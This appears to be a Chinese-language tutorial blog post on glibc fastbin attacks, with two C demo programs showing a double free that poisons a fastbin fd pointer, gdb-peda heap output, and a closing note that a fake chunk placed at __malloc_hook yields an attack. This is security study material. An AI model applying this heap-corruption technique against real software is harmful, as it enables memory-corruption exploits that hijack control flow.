Fastbin Attacks

2021-03-29

Fastbin

LIFO单链表结构:fd指针指向后一个堆块
chunk size<0x80
堆块释放时，后一个chunk 的 pre_inuse不会置零
可以leak heap base

前提

存在堆溢出、use-after-free 等能控制 chunk 内容的漏洞
能够申请并利用fastbin范围的chunk

原理

后一个chunk的pre_inuse不置零==>double free，可以控制已释放的chunk，与UAF等价
通过fd链接==>修改fd指针，直接申请到target addr

/*example1*/
int main(void)
{
    void *chunk1,*chunk2,*chunk3;
    chunk1=malloc(0x10);
    chunk2=malloc(0x10);

    free(chunk1);
    free(chunk2);
    free(chunk1);
    return 0;
}

如上代码可以成功编译并执行，此时fastbin中结构为 fastbin=>chunk1=>chunk2=>chunk1

也就是说同一chunk可以在fastbin中多次出现，因此我们可以将先申请到chunk1，修改其data段

但chunk1此时还在fastbin中，我们修改data段实际上是修改了在链表中的fd指针，因此当我们将data修改为 fake_chunk 时，fastbin中结构为fastbin=>chunk2=>chunk1=>fake_chunk

/*example2*/
#include<stdlib.h>
int main(void)
{
	int *chunk1,*chunk2,*chunk3,*chunk4;
	chunk1=malloc(0x10);
	*chunk1 = 0x10;
	chunk2=malloc(0x10);
	*chunk2 = 0x20;

	free(chunk1);
	free(chunk2);
	free(chunk1);

	int fake_chunk = 0xdeadbeef;
	chunk3=malloc(0x10);
	*chunk3=fake_chunk;

	return 0;
}

gcc double_free.c -o double_free -g

gdb-peda$ fastbin
fastbins
0x20: 0x602020 —▸ 0x602000 ◂— 0xdeadbeef

gdb-peda$ heap
0x602000 FASTBIN {
  prev_size = 0x0, 
  size = 0x21, 
  fd = 0xdeadbeef, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x21
}
0x602020 FASTBIN {
  prev_size = 0x0, 
  size = 0x21, 
  fd = 0x602000, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x20fc1
}

所以当我们继续申请，取出chunk2, chunk1之后，我们继续申请就会申请到fake_chunk，而当fake_chunk布局在敏感的地方（__malloc_hook或者其他可调用的函数指针）时就可以完成一次攻击。